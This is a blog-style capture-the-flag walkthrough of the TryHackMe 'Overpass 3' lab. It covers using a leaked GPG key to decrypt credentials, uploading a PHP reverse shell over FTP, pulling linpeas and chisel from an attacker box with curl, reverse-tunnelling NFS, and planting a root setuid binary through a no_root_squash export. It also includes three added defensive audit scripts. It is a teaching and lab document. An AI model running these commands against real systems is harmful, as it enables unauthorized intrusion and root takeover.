Write-up Overpass 3

Ekkie
10 min read · Jan 17, 2021

Hello folks! This is my first write-up on the subject of cybersecurity.

Let's get started!
Overpass3 | THM

https://tryhackme.com

Deploy the machine and wait about 5 minutes for all services to start.

Let's start with a scan of the running services to get an idea of what we are working with.

NMAP

$ sudo nmap -sC -sV -oN initial <Target-IP-address>
Results of our nmap scan against the target IP

NMAP reports 3 services.

  1. FTP on port 21
  2. SSH on port 22
  3. HTTP on port 80.

Webservice
Let's start by looking at the web service.

We have an index page; a quick look around did not give much info, but it lists some names that are potential usernames worth noting:
Paradox
Elf
MuirlandOracle
Ninjac01
James

Let's run gobuster against this web page to see if we can find more content.

Gobuster

$ gobuster dir -u <target IP-address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

While gobuster runs, let's check whether the FTP service allows anonymous access.

FTP
In general, you enter the word anonymous or ftp when the host prompts you for a username; you can enter anything for the password, such as your e-mail address or simply the word “guest”.

Credentials to use:
Name: anonymous
Password:

$ ftp <Target IP-address>

Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp>

Anonymous login failed, let's move on!

Gobuster

Gobuster reports a directory called /backups.
Let's open it and see what we can find.

http://Target-IP-address/backups/

A compressed archive.

Let's download it and see what's inside!

$ wget http://Target-IP-address/backups/backup.zip

ZIP-archive
And unzip it with:

$ unzip backup.zip
unzip extracting the archive

Looks like we have an encrypted CustomerDetails.xlsx GPG file.
GNU Privacy Guard (GPG) allows you to encrypt files so that only the holder of the matching private key can decrypt them.

And a private key!!?
Let's see if it decrypts the gpg file!!
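
The backup above is a good illustration of why "encrypted" is not the same as "safe": the ciphertext and the private key that unlocks it were shipped in the same downloadable archive. The script below is an added example, not code from the original write-up or from the room; it opens a zip archive, looks for private-key headers in the members, and raises a separate finding when key material and GPG ciphertext travel together. The sample archive it builds (priv.key, CustomerDetails.xlsx.gpg, README.txt) is constructed inline with placeholder contents, not the real backup.

```python
"""Flag private keys shipped inside a backup archive.

Added example, not part of the original write-up. It mirrors the lesson of the
backup.zip above: an encrypted file is only as safe as the key stored next to it.
"""
import io
import re
import zipfile

# Headers of key material that should never sit in a downloadable backup.
SECRET_MARKERS = {
    "pgp_private_key": re.compile(rb"-----BEGIN PGP PRIVATE KEY BLOCK-----"),
    "openssh_private_key": re.compile(rb"-----BEGIN OPENSSH PRIVATE KEY-----"),
    "pem_private_key": re.compile(rb"-----BEGIN (?:RSA |EC |DSA )?PRIVATE KEY-----"),
}
# Extensions that usually mean "GPG/PGP ciphertext".
CIPHERTEXT_EXTENSIONS = (".gpg", ".pgp")


def scan_zip_bytes(data):
    """Return a list of {'file', 'kind'} findings for the zip archive held in `data`."""
    findings = []
    key_files, ciphertext_files = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            content = zf.read(info.filename)
            for kind, pattern in SECRET_MARKERS.items():
                if pattern.search(content):
                    findings.append({"file": info.filename, "kind": kind})
                    key_files.append(info.filename)
            if info.filename.lower().endswith(CIPHERTEXT_EXTENSIONS):
                ciphertext_files.append(info.filename)
    # The real problem on the page: ciphertext and its private key in one bundle.
    if key_files and ciphertext_files:
        for name in ciphertext_files:
            findings.append({"file": name, "kind": "ciphertext_bundled_with_private_key"})
    return findings


def build_sample_backup():
    """Constructed archive with the same shape as the backup.zip on the page (fake contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "priv.key",
            "-----BEGIN PGP PRIVATE KEY BLOCK-----\n"
            "constructed placeholder, not a real key\n"
            "-----END PGP PRIVATE KEY BLOCK-----\n",
        )
        zf.writestr("CustomerDetails.xlsx.gpg", b"\x85\x02constructed ciphertext bytes")
        zf.writestr("README.txt", "nothing sensitive here\n")
    return buf.getvalue()


if __name__ == "__main__":
    # To check a real file: scan_zip_bytes(open("backup.zip", "rb").read())
    for finding in scan_zip_bytes(build_sample_backup()):
        print(f"{finding['kind']:40} {finding['file']}")
```

Run it against any backup before it lands in a web-served directory; a single `pgp_private_key` hit should block the upload, and the bundled-ciphertext finding explains why the encryption on the spreadsheet bought nothing.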

Decryption
Run the following commands in the terminal.

$ gpg --import priv.key

Nice, the import worked.
Let's try decrypting our file!

$ gpg -d CustomerDetails.xlsx.gpg > CustomerDetails.xlsx

We have decrypted CustomerDetails.xlsx.gpg into a new file named CustomerDetails.xlsx.
Let's have a look at what's inside the decrypted file; I used LibreOffice Calc to view it.

Usernames/passwords in the CustomerDetails.xlsx file, opened with LibreOffice Calc

This looks great!! Some usernames and passwords!

SSH

SSH on this box is key-only and does not accept passwords, so this is a dead end for now.

FTP

We still have an FTP service that we can try the credentials against, let's do it!

$ ftp <Target IP-address>

Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

ls output after logging in.

Nicely!!

We have some files and directories; the backups directory seems to contain the same zip file we downloaded before, and we can also see the index.html file.
Let's put a file in here and test whether we can reach it from the browser on the website!

PHP reverse-shell
We will download a PHP reverse shell to our box, edit it, and upload it to the victim box through FTP.

Download php-reverse-shell.php to your box

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

You can use wget to download it:

$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

To have an easier filename to work with, let's rename it:

$ mv php-reverse-shell.php rev.php

EDIT
Edit rev.php: set the $ip line to your THM IP (the IP of your attacker box, 10.x.x.x) and the $port line to a port you would like to use (above 1024):

$ nano rev.php
IP = your THM IP, port = 9001

I'm using port 9001.

Let's upload it to the FTP server, as the paradox user, with the put command:

FTP

ftp> put rev.php
# or, if rev.php is not in the directory you started the ftp session from:
ftp> put /path/to/your/file/rev.php rev.php

Use put rev.php if rev.php is in the same directory where you started your ftp session; otherwise give the full path as in the second form.

When the transfer is complete, exit the FTP session:

ftp> exit

Reverse shell

Start a netcat listener on the port we picked in rev.php (I'm using port 9001):

Netcat:

$ nc -lvnp 9001

Then visit the page in your browser and check netcat (nc) for a connection:

http://Target-IP-address/rev.php

Netcat (nc)

listening on [any] 9001 ...
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 36198
Linux localhost.localdomain 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:12:19 up 2:46, 0 users, load average: 0.00, 0.00, 0.00

Check the user ID with the id command:

$ id

Greaaaat!! We have a shell as the user apache!!

Escalate to another user

$ su paradox

Password: ****************

We use the password for paradox that we got from the CustomerDetails.xlsx file.

Check the id with the id command:

$ id

uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)

OK, great: the FTP password was reused for the local user paradox, which worked. I also tried the other usernames and passwords from the xlsx file (not shown in this write-up), but they did not work.

Let's run linpeas to see if we can find something to escalate privileges with!

Linpeas

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts. The checks are explained on book.hacktricks.xyz.

On your attacker machine (your box), download linpeas:

$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Python

Python ships with a web server module, so you can start a web server with a one-liner.

Start an HTTP server on your machine in the directory where you saved linpeas.sh:

$ python3 -m http.server

On the victim machine (target machine), as the paradox user, change directory to /dev/shm:

$ cd /dev/shm

Curl
Download linpeas from your box to the victim box (target box): specify http://Your-IP-address:port/filename and the output file with the curl command:

$ curl http://Your-IP-address:PORT/linpeas.sh -o linpeas.sh

This hits your python http.server (mine is on the default port 8000) and downloads linpeas.sh to the victim machine.

Chmod
Let's make the file executable:

$ chmod +x linpeas.sh

And run it:

$ ./linpeas.sh
linpeas starts its magic
linpeas reports a possible privilege escalation vector, which we then check manually:

no_root_squash:
More info about the subject: https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe

It took me a couple of hours to find a solution for this!
Let's start by upgrading our shell!

Upgrade your shell
In the command line on the victim box (target machine):

$ python3 -c "__import__('pty').spawn('/bin/bash')"
We could have done this as soon as we got the apache or paradox shell, but better late than never.

Tunneling
Chisel is a fast TCP/UDP tunnel, transported over HTTP.
https://github.com/jpillora/chisel
Download and install the binary on your own attacker box.

A great resource for more information about chisel and alternative installation methods:
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

Download chisel to the victim box (target machine)

Make a copy of the chisel binary into your current working directory and download it to the victim box (target box) as we did with linpeas.

On the victim box make sure that /dev/shm is your current working directory.
Restart your python3 http.server if you have closed it.

Your box (attacker machine)

$ cp /usr/local/bin/chisel .

From the victim box (target machine)

$ curl http://Your-IP-address:PORT/chisel -o chisel

Make the chisel binary executable on the victim box (target machine):

$ chmod +x chisel

Chisel

On your machine (attacker box)

$ chisel server --reverse --port 9002
chisel server with the --reverse and --port switches on our attacking box

Victim box (target machine)

$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049 &

2021/01/13 11:41:50 client: Connecting to ws://10.x.x.x:9002
2021/01/13 11:41:50 client: Connected (Latency 47.076869ms)

Information about how reverse chisel works.

# Only as learning information
$ chisel server --reverse --port 9002
# On the server side, port 9002 is a port we chose to listen on.
$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049
# R:2049:127.0.0.1:2049 means that once the client has connected to your
# server on 10.x.x.x:9002, the server (your box) also opens port 2049.
# Any packet that arrives on port 2049 on your side is sent through the
# tunnel on port 9002 and delivered to 127.0.0.1:2049 on the victim side.
# Hope you get the workflow, let's move on.

Great, we are connected with chisel!!

NFS mounting

As we saw earlier in this write-up, /etc/exports shows us the configuration of the NFS server. The share is exported with fsid=0, which makes /home/james the root share: mounting / from the server gives us /home/james.
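
The two settings that make the rest of this box possible are both in that one /etc/exports line: no_root_squash (flagged by linpeas above) and an export open to any client. As an added example, not part of the original write-up or the room, the script below parses exports syntax (path, then host(options) specs), reports the risky options, and rewrites an entry in its hardened form with root_squash made explicit. The SAMPLE_EXPORTS text is constructed to resemble what the write-up describes and is not the real file from the box.

```python
"""Audit /etc/exports for the NFS misconfiguration described above.

Added example, not part of the original write-up or the room. It parses the
exports syntax used by the Linux NFS server (path, then host(options) specs)
and flags the options that make the setuid-over-NFS trick possible.
"""
import re

# Constructed sample exports file, modelled on what the write-up describes.
# It is NOT the real /etc/exports of the Overpass 3 box.
SAMPLE_EXPORTS = """\
# /etc/exports - constructed example
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/srv/public 192.168.1.0/24(ro,sync,root_squash)
/srv/data   10.0.0.5(rw,sync)
"""

RISKY_OPTIONS = {
    "no_root_squash": "remote uid 0 is not mapped to nobody, so a client can plant root-owned setuid files",
    "insecure": "requests from ports above 1023 are accepted, so any unprivileged client process can talk to the server",
}
_SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return one entry per (path, client spec) pair: {'path', 'host', 'options'}."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]  # a bare path exports to everyone
        for spec in specs:
            m = _SPEC_RE.match(spec)
            if not m:
                continue  # malformed spec, e.g. an unclosed parenthesis
            host = m.group(1) or "*"
            options = [o for o in (m.group(2) or "").split(",") if o]
            entries.append({"path": path, "host": host, "options": options})
    return entries


def audit(entries):
    """Return (path, host, issue) triples for every risky setting found."""
    findings = []
    for e in entries:
        opts = set(e["options"])
        for opt in RISKY_OPTIONS:
            if opt in opts:
                findings.append((e["path"], e["host"], opt))
        if e["host"] == "*":
            findings.append((e["path"], e["host"], "world_exported"))
    return findings


def harden_line(entry, allowed_host):
    """Rewrite one export with the risky options removed, a specific client, and root_squash explicit."""
    kept = [o for o in entry["options"] if o not in RISKY_OPTIONS]
    if "root_squash" not in kept:
        kept.append("root_squash")
    return f"{entry['path']} {allowed_host}({','.join(kept)})"


if __name__ == "__main__":
    exports = parse_exports(SAMPLE_EXPORTS)
    for path, host, issue in audit(exports):
        print(f"{path} {host}: {issue} ({RISKY_OPTIONS.get(issue, 'exported to every host')})")
    print("hardened:", harden_line(exports[0], "10.0.0.5"))
```

root_squash is the NFS server default, so the hardened line only makes explicit what removing no_root_squash already restores; restricting the client list is the second half of the fix, since fsid=0 on a home directory is harmless only if nobody untrusted can mount it.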

Your attacker box
Make a new folder on which we will mount the victim box's (target machine's) / share:

$ mkdir mount

$ sudo mount -t nfs localhost:/ mount/

Check if it worked and list the contents.

If you get something like "bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program." then you are missing an NFS package; install it with $ sudo apt install nfs-common

$ cd mount
$ ls -al

We have the user.flag!! It is right here and we can read it (we are inside /home/james).
We can also see the .ssh folder!

Let's check what's inside:

$ cd .ssh/
$ ls

Grab the id_rsa file and copy it out of the mount to your box; you can use the cp command, or just cat the file and paste the contents into a new file. Save it as id_rsa on your box.

SSH
We will SSH in as james with the id_rsa to see if we can get in.

$ chmod 600 id_rsa
$ ssh -i id_rsa james@<Target-IP-address>

Great, we are in. We will come back to this SSH session as james to run a binary later on. Also keep the chisel services and the mount point running!! Let's work on the next step!!

GETTING ROOT with a binary

On your machine (attacker box!)

In your NFS mount (the same place where we have the user.flag and the .ssh folder on your box), type in the terminal:

$ echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > exploit.c
This creates exploit.c; be sure that you are in the right directory, i.e. the mount where you can access the shared files of the victim box.

Then

$ sudo gcc exploit.c -o exploit

This compiles a binary that simply sets the GID and UID to root with setgid() and setuid() and then executes a bash shell.

Warnings: don't bother with them. Everything is OK!! Keep moving on.

Then

$ sudo chmod +s exploit
This sets the setuid/setgid bits on a root-owned file; because the share is exported with no_root_squash, that root ownership is kept on the victim's side. Let's see the results!!!

Let's try if we can get a root shell!!
Let's run the binary as the james user which we SSHed in as earlier:

SSH to the <Target IP> with the id_rsa file as the james user if you don't have that session open any more.
The binary to execute is ./exploit

Execute the binary and check the id:

$ ./exploit
$ id

Well done!! We have our root shell, let's grab the root flag!!
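
What the previous steps leave behind on the server is a root-owned file with the setuid and setgid bits under /home/james, which is exactly the artefact a defender can sweep for. The script below is an added example (not code from the write-up or the room): it classifies files by mode and owner, ignores the system directories where setuid binaries such as passwd legitimately live, and reports everything else. The SAMPLE_RECORDS list is constructed to stand in for lstat() results; collect_records() gathers the same records from a real tree. The SYSTEM_PREFIXES allowlist is an assumption to tune per distribution.

```python
"""Report setuid/setgid executables that live outside the usual system directories.

Added example, not part of the original write-up. The binary planted through
the NFS mount on this page ends up as a root-owned setuid file under a home
directory; a periodic sweep like this one is how a defender would spot it.
"""
import os
import stat

# Directories where root-owned setuid binaries are expected (passwd, sudo, ...).
# This allowlist is an assumption for the example; tune it per distribution.
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def classify(path, mode, uid):
    """Return a finding label for a privileged file in an unexpected place, else None."""
    if not stat.S_ISREG(mode):
        return None  # symlinks and directories are not setuid executables
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    if path.startswith(SYSTEM_PREFIXES):
        return None
    return "root_setuid_outside_system_dirs" if uid == 0 else "user_setuid_outside_system_dirs"


def scan_records(records):
    """records: iterable of (path, st_mode, st_uid); returns (path, mode_octal, uid, label) hits."""
    hits = []
    for path, mode, uid in records:
        label = classify(path, mode, uid)
        if label:
            hits.append((path, oct(mode & 0o7777), uid, label))
    return hits


def collect_records(root):
    """Walk a real filesystem tree into the record shape scan_records() expects."""
    records = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat so a symlink is reported as a link, not its target
            except OSError:
                continue
            records.append((full, st.st_mode, st.st_uid))
    return records


# Constructed records standing in for lstat() results on the box.
SAMPLE_RECORDS = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),       # expected system binary, ignored
    ("/home/james/exploit", stat.S_IFREG | 0o6755, 0),   # what `sudo chmod +s` over NFS leaves behind
    ("/home/james/notes.txt", stat.S_IFREG | 0o644, 1000),
    ("/dev/shm/linpeas.sh", stat.S_IFREG | 0o755, 1001),
    ("/home/james/link", stat.S_IFLNK | 0o4777, 0),      # symlink, ignored
]

if __name__ == "__main__":
    for hit in scan_records(SAMPLE_RECORDS):
        print(*hit)
    # For a real sweep of home directories: scan_records(collect_records("/home"))
```

A cron job running `scan_records(collect_records("/home"))` and alerting on any `root_setuid_outside_system_dirs` hit would have caught this binary the moment it was created, whatever the NFS export settings.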

$ cd /root
$ ls
root.flag is located in /root

Nicely, we have our root.flag

Waaait a minute!! We are missing one flag: the web.flag!!
I looked for the web flag for many hours and then gave up on it. That was before I had the james or root shell. Let's try again!!

Web flag
Hunting the web flag and finishing the box!!
As we know, our two flags end with the .flag extension; could it be somewhere in the filesystem we missed looking in????

Find the web flag!

$ find / -type f -name '*.flag' 2>/dev/null
Ohhh yeesss!!! /usr/share/httpd/web.flag is the location of the web flag.
$ cd /usr/share/httpd/
$ ls -al
Or, more directly: $ find / -type f -name web.flag 2>/dev/null

Now we have all of the flags which we can submit to the room.
Well done!

I hope you enjoyed the box and my first written write-up!
Thanks to the THM team and the room-owner for this beginner friendly challenging box!

Be safe! happy hacking!
//Ekkie!!
